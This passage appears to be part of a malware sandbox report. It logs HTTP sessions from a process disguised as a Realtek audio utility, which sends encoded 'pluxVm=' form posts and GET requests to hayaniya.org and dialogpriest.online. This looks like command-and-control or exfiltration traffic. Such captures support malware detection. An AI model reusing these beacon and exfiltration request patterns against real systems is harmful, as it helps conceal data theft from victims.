                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 64 58 72 6b 59 6d 79 48 77 62 4a 4f 49 64 58 73 6d 73 42 63 32 44 5a 36 34 68 54 54 46 31 7a 77 45 36 36 7a 4b 33 41 4f 4a 68 5a 31 54 6c 6a 55 59 37 49 2f 37 36 67 58 5a 39 65 63 62 6d 69 57 50 57 7a 53 4e 6e 62 6e 54 68 42 6b 67 51 48 68 39 6e 59 55 57 4e 36 61 32 39 58 61 45 46 6b 65 35 74 62 61 6f 57 46 44 59 79 6a 4a 36 69 53 39 70 66 64 4c 77 6f 31 77 73 34 65 7a 30 5a 39 32 32 50 43 6b 61 4e 52 4c 46 4a 74 79 45 48 36 79 55 61 2f 37 78 73 43 51 42 44 6d 67 58 31 77 52 56 72 39 36 32 63 59 75 55 42 2f 37 52 68 65 7a 33 75 55 67 4f 2b 58 4d 66 62 7a 30 6b 68 54 57 43 59 69 66 65 79 4a 34 4d 5a 70 52 69 69 68 56 5a 5a 4c 44 62 47 54 32 4e 49 43 77 76 4a 4c 74 53 4e 33 54 38 37 41 62 76 37 6e 48 41 62 4c 30 43 58 51 7a 32 56 70 75 77 2f 71 47 30 51 30 69 4a 62 4d 56 37 76 61 53 33 45 6a 48 31 73 48 65 6f 33 6a 56 73 71 35 71 55 39 39 47 43 5a 4f 78 57 57 62 37 54 79 4a 46 34 4b 7a 6a 4f 78 53 6b 5a 63 42 65 78 31 6a 6b 43 5a 52 55 30 4d 66 76 6c 46 63 64 2b 74 47 56 35 30 49 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=dXrkYmyHwbJOIdXsmsBc2DZ64hTTF1zwE66zK3AOJhZ1TljUY7I/76gXZ9ecbmiWPWzSNnbnThBkgQHh9nYUWN6a29XaEFke5tbaoWFDYyjJ6iS9pfdLwo1ws4ez0Z922PCkaNRLFJtyEH6yUa/7xsCQBDmgX1wRVr962cYuUB/7Rhez3uUgO+XMfbz0khTWCYifeyJ4MZpRiihVZZLDbGT2NICwvJLtSN3T87Abv7nHAbL0CXQz2Vpuw/qG0Q0iJbMV7vaS3EjH1sHeo3jVsq5qU99GCZOxWWb7TyJF4KzjOxSkZcBex1jkCZRU0MfvlFcd+tGV50I45TSAGWkcnUb/YlDnVXCBBrGjcqSZsJyM9BCE941C2VsxebSJLmbjt3lB0FxDaNvb1zq7VpNfZgb1czrxwsI1+phD9pevEk4GCk+5dUr035u98ohZhomqIoo5VcXsW7ljShx4FFvnfR/uPfefLCUhTjmPXFV+v8xRyhBmGiMEKDG7MDKR6s7o8om8F7TXT7/fJHrsLfpMgTsvxCw/qcTAxTVT8sMUf5v1zaw0sjIrCKg2zjZz5eEc17+3MbGN4tAc67NUCQZPnT+KtoKxG440QRiF5itJXY0WRsSwivJOMeMmDNwA3SBOTKymSG/tJFTrQ3VZFEtK4q7JfIVsIFMUrYS5YAn1GRh/qo5sLuzML1c65uwhGrWgwp3ORcOKTII5olQIEzSUpOSs0hu9ToWaTMY3yjNE4q/HKm+iR8V6DHX9xg1ho8sNuxITKdC5+wT+qKBWmPfRTjasIM6gWbKz/oZbwtgu6ijtpy3fHXyxnY7S8sk91KnP9rVyj6fvAiwk+lk3sNac30KcA7gxrB407I1a5pU+h0OvCP1JUzubbpOdAHy/V1QkA0FLZ9nB+4QNR1yqbBfjjs4+KkmPubNMI72bqLnIAMIGRxueJheWRdKdq5zkBgarMi/E5n0Xuhi3IsS9m2SPKgg7rN0xMZZEYZSSj7eK+HFtf [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727176905 CET3867OUTData Raw: 61 43 6f 39 59 46 34 66 50 62 64 79 73 71 7a 64 4c 72 4e 4d 6a 37 58 49 5a 38 73 36 64 6d 43 54 76 61 45 2f 72 6b 78 56 58 5a 37 7a 57 44 35 76 45 67 59 65 46 47 38 53 5a 66 43 63 74 55 39 67 59 52 34 62 58 59 31 64 76 4f 48 37 30 59 50 64 44 6e
                                                                                                                                                                                                                                Data Ascii: aCo9YF4fPbdysqzdLrNMj7XIZ8s6dmCTvaE/rkxVXZ7zWD5vEgYeFG8SZfCctU9gYR4bXY1dvOH70YPdDnQaoBRvQspvEFGAHaHObautOK2bhDaMrf1ODoj8czTZqb9xbo95Xt9wt2kdpF2LSicCmN9oeujPPZDa4ujXYGxxShcwTIGNHsbLH+RPYuJETt5YXC4tmK8pu/u4rYyLYHmUOm+DjuBSnItgRMh/6ORF+OeU2S4lNix
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727252007 CET1404OUTData Raw: 75 38 37 31 6d 42 4b 36 73 34 55 56 45 76 36 74 33 6f 58 53 55 70 5a 50 52 47 79 73 78 6f 51 33 63 50 74 63 2b 2f 49 36 35 4a 44 75 73 56 4f 49 6d 6c 30 44 72 68 76 6e 77 73 34 70 2f 77 4f 6c 66 43 2f 44 68 78 36 4c 5a 62 6f 51 33 57 6f 4c 76 45
                                                                                                                                                                                                                                Data Ascii: u871mBK6s4UVEv6t3oXSUpZPRGysxoQ3cPtc+/I65JDusVOIml0Drhvnws4p/wOlfC/Dhx6LZboQ3WoLvED7kvNKMaR+wmGiFzoP9JXUY5GiXF+56yONdDaTQabBd7X/mRhvHpsVTm3yzvw1tIkefohAnF9AjZp3/hh2baQn6ejGBgXdahDJnKNT2kpRdoDqG5X0vOyKhbjJZmbTjVmaL5LhwWuB25/5guH+1iCQs59GFd/hlu1
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164474964 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:31 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z]wD8A6l1>jT;~s`uU|f
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164496899 CET1289INData Raw: c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08 bb e3 ab b4 6e b8 90 b8 b7 2f 27 bb ef b0 13 cf 77 da bf a9 6d f6 1e 48 a2 12 c9 0d d5 20 20 82 d9 ee e2 ae 40 df de c3 22 48 26 93 89 fc 44 7d 76 b6 b7 24 38
                                                                                                                                                                                                                                Data Ascii: w7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$Jmx}`$n/[YYW^KCN
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164513111 CET1289INData Raw: 3b 77 ee b8 34 8e 18 9e 1d 18 ba c8 78 8f 86 d9 21 31 57 0f 20 6a 0b 09 4b 1f 18 5c d4 84 4e 51 1c 60 a0 b5 36 1c 10 ea 07 ea c0 68 91 70 2d 02 60 55 50 17 08 b1 04 a6 0e 8c a6 d1 6c 34 07 1b 61 e0 42 51 07 33 84 19 f5 21 0d 35 1b 9b 3d 32 99 f9
                                                                                                                                                                                                                                Data Ascii: ;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg!W\6ML]'LGw\Ac!>E<wg;Vs:H ZY?y8&6p'+?*Re?t}
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164534092 CET1289INData Raw: b2 f7 30 c4 d2 a7 1c b6 d8 dc 20 db 71 b9 41 f6 5a 69 96 39 b6 37 2b 21 03 af 36 13 ce 31 72 04 4b 42 1e d7 f3 d4 ae b2 74 41 49 85 b6 fa 92 48 c4 0a 01 7e d8 59 91 fa 59 ad 46 bb 77 ad da ca d0 b2 b6 11 e0 18 aa b0 5e 52 c8 87 f9 f7 c0 38 c1 72
                                                                                                                                                                                                                                Data Ascii: 0 qAZi97+!61rKBtAIH~YYFw^R8rwUKy==FB*Ua+[/<@Wl0#((5Nu${-kz,(ITHb|m"nD^Z7A.B>m)TU)_-uUm%2bkKj:;/EK1;.w
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164556980 CET1289INData Raw: 0c 73 cf b0 e2 19 e5 9e d1 c2 33 f8 f9 cf 31 95 e2 ef 7f d3 7b ef 37 3b c3 07 2e 8d 23 86 67 13 9c 28 a1 3d d9 85 fb 8d c1 f5 2e bc 54 21 05 59 c5 28 0e b0 24 2e 6a 5e 43 86 11 4b 7c ca 63 6b a9 40 1c c7 44 c5 16 a3 76 ae 0f 84 a7 24 16 21 c9 74
                                                                                                                                                                                                                                Data Ascii: s31{7;.#g(=.T!Y($.j^CK|ck@Dv$!t;6{Vy=l-0,om/F[[;~HLNY+4ZHBRX,mLs~IV.U_Edb(b)c!UbN\9(~f9$
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164572954 CET1289INData Raw: df cc 9f a5 cf 8d fc f9 22 7d 03 bf 4f e7 4f 96 ae f3 f4 75 fa 62 fe 87 cc 9a 7f a3 dd df e6 81 97 f0 38 d7 99 a6 21 09 83 71 22 84 e9 37 d8 77 6c e1 c3 b1 15 e5 4c 00 17 d9 21 5c ac f0 f2 80 48 d3 08 3a 89 44 ac cc f5 68 76 8c 61 73 71 b3 ba bb
                                                                                                                                                                                                                                Data Ascii: "}OOub8!q"7wlL!\H:DhvasqgUx<X8&N&TQ6=h49,#6b%51[B@!x8abU4kEqR@{_$B=(=*}cc"\OBXQxgI9Z,uI|
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164779902 CET777INData Raw: d8 a2 e5 1c 4b b7 5c 1b bb 09 29 4e ec 90 2e d1 e8 d7 d6 d1 8b 73 5d 63 76 e6 80 4b 15 5a b2 32 0e 4b bb e2 5e 98 4b bb 1a af 95 a0 23 58 12 72 63 c5 81 da bd 8a 43 89 68 33 ab b0 36 3d a8 d7 f2 48 bb 67 57 22 1a 23 0a 85 4d 19 31 0d 17 2b 8c b2
                                                                                                                                                                                                                                Data Ascii: K\)N.s]cvKZ2K^K#XrcCh36=HgW"#M1+?$%Qqwin[".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164799929 CET1289INData Raw: 31 66 61 30 0d 0a e0 6e c5 92 b5 e6 d2 de e2 8c 89 a3 a8 28 da 8e 8b d7 e6 96 65 60 e9 51 22 aa f1 16 d6 a6 07 75 ba dd 51 6b e8 1a 1b 3d 17 f7 09 81 5e 46 6a 12 62 25 89 72 02 52 2d d6 b7 40 a1 b0 69 6d 8d 2d 4e 49 dd b0 80 50 3f 50 c8 25 1e 4e
                                                                                                                                                                                                                                Data Ascii: 1fa0n(e`Q"uQk=^Fjb%rR-@im-NIP?P%N44\0,H"21"(HzP8*}cc"\OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJ
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164815903 CET1289INData Raw: 8d d4 22 dc 2b 15 bd b0 af 24 d3 6d 3c e7 f4 7e 07 8f 37 99 5e f5 f3 cd fc f1 fc 29 fc dd a6 80 bb c3 f6 95 f8 6e 57 20 0e 2a da d3 ea d2 e4 e3 c1 1a 59 0b 46 3b 95 43 b4 2a 9d bc d2 86 6f ff 12 e2 be 06 1e ce 33 21 be 02 f6 ce 73 86 80 ae d7 c0
                                                                                                                                                                                                                                Data Ascii: "+$m<~7^)nW *YF;C*o3!sW~ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.11.2049807192.185.147.100807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.381623030 CET419OUTGET /vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.634823084 CET490INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:34 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Location: http://hayaniya.org/vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                49192.168.11.2049808176.31.209.107807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.113451004 CET701OUTPOST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 4b 51 6c 75 4e 30 2b 62 4a 62 2b 5a 76 47 78 51 70 52 66 4e 4e 6e 57 41 46 6f 57 6d 52 45 4a 69 45 44 30 6a 6b 75 2f 2f 69 4e 5a 57 68 56 50 45 55 43 62 7a 68 50 51 63 42 37 7a 58 38 79 55 32 63 54 68 5a 4e 59 46 7a 44 54 4f 6d 32 6c 69 56 55 78 73 69 6e 46 56 69 43 35 78 39 4b 68 7a 4e 58 44 47 52 51 72 69 65 31 65 69 51 6b 31 59 4a 6d 30 66 6a 57 70 70 77 56 39 38 53 46 74 76 30 4f 34 4e 57 57 65 4c 4e 44 44 4f 71 2f 39 51 69 4e 41 76 51 62 43 73 35 50 33 6a 78 6f 6e 36 4b 6b 67 56 59 69 72 57 41 4b 4d 73 61 2f 73 35 77 2b 75 44 76 48 38 59 48 79 64 6c 62 45 74 6f 79 34 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZvGxQpRfNNnWAFoWmREJiED0jku//iNZWhVPEUCbzhPQcB7zX8yU2cThZNYFzDTOm2liVUxsinFViC5x9KhzNXDGRQrie1eiQk1YJm0fjWppwV98SFtv0O4NWWeLNDDOq/9QiNAvQbCs5P3jxon6KkgVYirWAKMsa/s5w+uDvH8YHydlbEtoy4g==
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809576035 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:39 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 37 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 77 77 77 2e 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809627056 CET820INData Raw: 6f 2e 63 6f 6d 2f 63 68 65 63 6b 64 6f 6d 61 69 6e 6f 66 66 65 72 2e 70 68 70 3f 6c 61 6e 67 75 61 67 65 3d 65 73 26 64 6f 6d 61 69 6e 3d 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 26 70 61 72 74 6e 65 72 69 64 3d 33 31 38 38 37 36
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                50192.168.11.2049809176.31.209.107807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:42.836472988 CET721OUTPOST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 4b 51 6c 75 4e 30 2b 62 4a 62 2b 5a 75 6d 68 51 72 77 66 4e 49 48 57 48 5a 34 57 6d 49 55 4a 6d 45 44 6f 6a 6b 73 54 57 2b 76 39 57 68 31 66 45 56 48 6e 7a 69 50 51 63 53 37 7a 4f 34 79 55 4c 63 54 74 72 4e 5a 35 7a 44 54 61 6d 32 67 65 56 55 42 51 68 31 46 56 73 4b 5a 78 37 58 78 7a 4e 58 44 47 52 51 72 33 37 31 66 47 51 6b 47 77 4a 6e 56 66 67 56 70 70 2f 55 39 38 53 50 4e 76 77 4f 34 4e 4f 57 63 2f 6e 44 42 47 71 2f 39 67 69 49 45 62 54 53 43 73 2f 43 58 69 37 73 46 7a 54 69 54 4a 51 6b 37 65 50 51 2f 38 41 36 36 30 71 6a 63 33 4c 45 76 45 31 32 74 63 7a 47 76 70 70 6c 75 35 58 6f 76 75 50 5a 6a 38 63 37 4e 50 53 6f 59 34 7a 36 73 34 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=KQluN0+bJb+ZumhQrwfNIHWHZ4WmIUJmEDojksTW+v9Wh1fEVHnziPQcS7zO4yULcTtrNZ5zDTam2geVUBQh1FVsKZx7XxzNXDGRQr371fGQkGwJnVfgVpp/U98SPNvwO4NOWc/nDBGq/9giIEbTSCs/CXi7sFzTiTJQk7ePQ/8A660qjc3LEvE12tczGvpplu5XovuPZj8c7NPSoY4z6s4=
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031315088 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:42 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 37 36 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 77 77 77 2e 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 761<!DOCTYPE html><html> <head> <meta charset="utf-8"><title>www.dialogpriest.online</title> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> <center><p>El dominio <a href="http://dialo [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031544924 CET820INData Raw: 6f 2e 63 6f 6d 2f 63 68 65 63 6b 64 6f 6d 61 69 6e 6f 66 66 65 72 2e 70 68 70 3f 6c 61 6e 67 75 61 67 65 3d 65 73 26 64 6f 6d 61 69 6e 3d 64 69 61 6c 6f 67 70 72 69 65 73 74 2e 6f 6e 6c 69 6e 65 26 70 61 72 74 6e 65 72 69 64 3d 33 31 38 38 37 36
                                                                                                                                                                                                                                Data Ascii: o.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876">venta</a> y est alojado en <a href="http://www.wesped.com/" target="_top" alt="Web Hosting y dominios">Wesped</a></p> <p>Compra <a href="https://www.w


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                51192.168.11.2049810176.31.209.107807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.554203987 CET2578OUTPOST /7znk/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.dialogpriest.online
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.dialogpriest.online
                                                                                                                                                                                                                                Referer: http://www.dialogpriest.online/7znk/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
